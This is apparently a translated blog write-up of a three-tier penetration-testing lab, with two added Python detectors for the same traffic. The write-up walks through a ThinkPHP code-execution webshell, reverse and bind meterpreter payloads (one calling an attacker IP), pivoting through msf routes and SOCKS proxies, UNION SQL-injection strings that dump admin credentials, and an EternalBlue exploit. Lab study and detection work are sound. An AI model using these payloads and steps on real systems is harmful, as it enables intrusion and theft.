CFS three-layer lab: internal network penetration

Date: 2023-02-23 12:11:36

Lab VM download: https://pan.baidu.com/share/init?surl=O9pgm9UZCSIdifMEb0E9ZA#list/path=%2F
Extraction code: qazz
The environment configuration and the lab host IP addresses are shown below.

Attacker: a Tencent Cloud host with msf installed, plus a local Kali machine
target1 (CentOS 7) 192.168.99.122 192.168.52.16
target2 (Ubuntu) 192.168.52.15  192.168.33.22
target3 (Windows 7) 192.168.33.33

target1 is exposed to the public internet through an ftp proxy.

The entry point is therefore http://45.113.0.116/

Opening it shows a site built on the ThinkPHP framework. Checking it with a tool shows that it is affected by the tp5_construct_code_exec_4 vulnerability.

Obtain a webshell

Connect with AntSword; the connection succeeds.

Next, bring this host into msf to make post-exploitation easier. Generate a reverse-connection Linux payload:

[root@VM-4-12-centos ~]# msfvenom -p linux/x64/meterpreter_reverse_tcp lhost=43.142.178.54 lport=1234 -f elf>222.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 1068640 bytes
Final size of elf file: 1068640 bytes

Upload it to the target with AntSword and give it execute permission.

Then start a listener in msf:

use exploit/multi/handler 
set payload linux/x64/meterpreter/reverse_tcp 
set lhost 0.0.0.0
set lport 1234
run

Run the payload.

A shell is obtained.

Looking at the local routes, there is one leading to the 192.168.52.0 segment:

run get_local_subnets

Add it:

run autoroute -p
run autoroute -s 192.168.52.0/24

Background the session, then start a proxy with the socks module so that we can work against the target:

use auxiliary/server/socks_proxy

set srvport 1085

run 

Configure the proxy manager; the connection works.

Entering the second target's address, http://192.168.52.15/, in the browser shows BageCMS.

Out of habit, press F12 to take a look; a hint is given there.

Try injection: appending a single quote produces an error.

Enumerate the number of columns.

Then use UNION to extract the database name, table names and column names:

1%27%20union%20select%201,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39--+
1%27%20union%20select%201,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39%20from%20information_schema.tables%20where%20table_schema%20=%20database()--+
1%27%20union%20select%201,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39%20from%20information_schema.columns%20where%20table_name%20=%20%27bage_admin%27--+
1%27%20union%20select%201,group_concat(username),group_concat(password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39%20from%20bage_admin%20--+

Finally, the admin password is dumped: 46f94c8de14fb36680850768ff1b7f2a

Reversing the MD5 gives 123qwe.
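An added example, not part of the original post: a Python check a defender could run over the web server's access log on target2 to spot the single-quote probe and the UNION-based enumeration shown above. The log lines are constructed, and the `/index.php?id=` path and parameter are assumptions, since the page does not name the injectable parameter.

```python
import re
from urllib.parse import quote, unquote_plus, urlsplit

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

# Patterns follow the shape of the requests above, matched after URL-decoding.
RULES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "schema_enum": re.compile(r"\binformation_schema\.(?:tables|columns)\b"),
    "column_padding": re.compile(r"(?:\d+\s*,\s*){10,}\d+"),  # 3,4,5,...,39
    "quote_then_comment": re.compile(r"'.*--\s*$"),
}

def _line(status, value):
    """Build one constructed log line; path and parameter name are assumed.
    The client is target1's inner address, because pivoted requests arrive
    from the compromised host, not from the attacker."""
    return ('192.168.52.16 - - [20/Jan/2023:17:00:00 +0800] '
            f'"GET /index.php?id={quote(value, safe="")} HTTP/1.1" {status} 512')

PAD = ",".join(str(i) for i in range(3, 40))
SAMPLE_LOG = [  # constructed sample data
    _line(200, "1"),
    _line(500, "1'"),
    _line(200, f"1' union select 1,database(),{PAD}-- "),
    _line(200, f"1' union select 1,group_concat(table_name),{PAD} "
               "from information_schema.tables where table_schema = database()-- "),
    _line(200, "student union events"),  # benign text containing "union"
]

def scan(lines):
    """Return (line number, client, matched rule names) for suspicious requests."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target, status = m.group(1), m.group(2), int(m.group(3))
        query = unquote_plus(urlsplit(target).query).lower()
        hits = sorted(name for name, rx in RULES.items() if rx.search(query))
        if "'" in query and status >= 500:  # quote that triggers a server error
            hits.append("quote_probe_5xx")
        if hits:
            findings.append((n, client, hits))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```
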

Log in and find a sensitive feature: templates.

Write a webshell

Connect with Chopper (菜刀) through the proxy tunnel.

Next, bring this host into msf as well. Because it has no outbound internet access, we have to connect to it in the forward direction:

msfvenom -p linux/x64/meterpreter/bind_tcp lport=4443 -f elf>12345.elf

Upload it, give it execute permission, and run it.

msf connects to it in the forward direction, and the session comes up.

Then the same approach as before: add a route and move into the next segment.

run get_local_subnets
run autoroute -s 192.168.33.0/24

We already know that the last host has the EternalBlue vulnerability, so create another proxy and attack it directly:

use auxiliary/server/socks_proxy

set srvport 1090

run

Edit the proxychains configuration:

vi /etc/proxychains4.conf

Test the proxy: it works.

proxychains msfconsole  # start msf
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.33.33
run

EternalBlue is present.

Then attack with the exploit module:

use exploit/windows/smb/ms17_010_psexec
show options
set payload windows/x64/meterpreter/bind_tcp
set rhosts 192.168.33.33
run

The last host is taken; that ends the exercise.
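An added example, not from the original post: a Python check over flow records that flags the east-west connections this walkthrough depends on, and identifies a dual-homed host being used as a relay between segments. The host addresses are the lab's; the allowed-flow policy and the flow records are constructed assumptions.

```python
# Host inventory from the lab description: name -> interface addresses.
HOSTS = {
    "target1": ["192.168.99.122", "192.168.52.16"],
    "target2": ["192.168.52.15", "192.168.33.22"],
    "target3": ["192.168.33.33"],
}
IP_TO_HOST = {ip: host for host, ips in HOSTS.items() for ip in ips}

# Assumed policy (not from the page): the only inter-host flow the design
# needs is target1 reaching the web application on target2.
ALLOWED = {("target1", "target2", 80)}

# Constructed flow records: (epoch seconds, src ip, dst ip, dst port).
SAMPLE_FLOWS = [
    (1000, "203.0.113.7", "192.168.99.122", 80),     # external client to web front
    (1002, "192.168.52.16", "192.168.52.15", 80),    # permitted by policy
    (1300, "192.168.52.16", "192.168.52.15", 4443),  # bind listener port from the page
    (1302, "192.168.33.22", "192.168.33.33", 445),   # SMB into the inner segment
]

def is_violation(flow):
    """True when both ends are inventory hosts and the flow is not allowlisted."""
    _, src, dst, port = flow
    s, d = IP_TO_HOST.get(src), IP_TO_HOST.get(dst)
    return bool(s and d and s != d and (s, d, port) not in ALLOWED)

def policy_violations(flows):
    return [(ts, IP_TO_HOST[s], IP_TO_HOST[d], p)
            for ts, s, d, p in flows if is_violation((ts, s, d, p))]

def pivot_candidates(flows):
    """Hosts that accept a violating flow on one interface and afterwards
    open a flow to another inventory host from a different interface."""
    found = set()
    for t_in, _, ip_in, _ in (f for f in flows if is_violation(f)):
        host = IP_TO_HOST[ip_in]
        for t_out, ip_out, dst, _ in flows:
            if (t_out >= t_in and ip_out != ip_in
                    and IP_TO_HOST.get(ip_out) == host
                    and IP_TO_HOST.get(dst) not in (None, host)):
                found.add(host)
    return sorted(found)

if __name__ == "__main__":
    print(policy_violations(SAMPLE_FLOWS))
    print(pivot_candidates(SAMPLE_FLOWS))
```
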

From: https://www.cnblogs.com/bnlbnf/p/17147478.html
